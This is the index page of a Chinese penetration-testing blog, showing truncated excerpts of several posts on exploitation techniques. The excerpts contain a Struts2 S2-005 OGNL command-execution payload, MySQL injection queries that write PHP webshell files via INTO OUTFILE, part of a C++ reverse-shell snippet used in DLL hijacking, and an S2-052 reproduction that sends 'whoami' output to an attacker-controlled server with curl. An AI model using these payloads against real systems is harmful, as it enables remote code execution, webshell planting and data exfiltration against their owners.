记一次struts2-005

时间:2018-3-26   作者:webbaozi   分类: 渗透测试   热度:263°    
时间:2018-3-26   分类: 渗透测试    热度:263  
如图: 执行id参数可以成功执行,但是当命令中含有空格时执行命令就会失败。 然后调试发现把命令中的空格换成\40即可成功执行命令 这里附上s2_005的命令: ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]

阅读全文>>

热门 .net突破限制执行命令

时间:2017-12-28   作者:webbaozi   分类: 小技巧   热度:1114°    
时间:2017-12-28   分类: 小技巧    热度:1114  
遇见过一次可以使用 受影响的版本为: Microsoft .NET Framework 2.0  Microsoft .NET Framework 3.5 Microsoft .NET Framework 3.5.1 Microsoft .NET Framework 4 Microsoft .NET Framework 4.5 Microsoft .NET Framework 4.5.1 利用条件: 1.需要支持aspx并且高于Microsoft .NET Framework 1.14版本 2....

阅读全文>>

热门 c++反弹代码

时间:2017-10-30   作者:webbaozi   分类: 渗透测试   热度:904°    
时间:2017-10-30   分类: 渗透测试    热度:904  
在dll劫持中使用挺不错的,之前放在nopad++中,成功反弹。 代码如下: LPCSTR szMyUniqueNamedEvent = "sysnullevt"; HANDLE m_hEvent = CreateEventA(NULL, TRUE, FALSE, szMyUniqueNamedEvent); switch (GetLastError()) { // app is already running case ERROR_ALREADY_EXISTS: { CloseHandle(m_hEvent); bre...

阅读全文>>

热门 通过mysql注入写文件

时间:2017-10-30   作者:webbaozi   分类: 小技巧   热度:1126°    
时间:2017-10-30   分类: 小技巧    热度:1126  
1. select * from admin where id =-1 union select 1,'<?php phpinfo();?>',3,4 into outfile 'c:\\1.php'   2. select * from admin where id =-1 or 1=1 limit 0,1 INTO OUTFILE 'c:/2.php' LINES TERMINATED BY 0x3C3F70687020706870696E666F28293B3F3E-- 此写法需要查询出数据,才能...

阅读全文>>

热门 php反序列小记

时间:2017-10-21   作者:webbaozi   分类: 小技巧   热度:944°    
时间:2017-10-21   分类: 小技巧    热度:944  
存在反序列漏洞的php代码 <html> <head> <title>WEB</title> </head> <body> <?php class Readflag{ var $file; function __destruct(){ if(isset($this->file)){ echo file_get_contents($this->file); } } function __wakeup(){ if($this->fi...

阅读全文>>

热门 struts2-02-052复现笔记

时间:2017-9-6   作者:webbaozi   分类: 小技巧   热度:868°    
时间:2017-9-6   分类: 小技巧    热度:868  
网上已经有很多复现过程了,这里就做个笔记 vps上执行: python -m SimpleHTTPServer 8080 然后执行命令powershell "curl http://ip:port/index.php?whoami=$(whoami)" powershell支持curl(测试机win7powershell不支持curl,未测) POST /struts2-rest-showcase/orders/4 HTTP/1.1 Host: 192.168.1.212 User-Agen...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1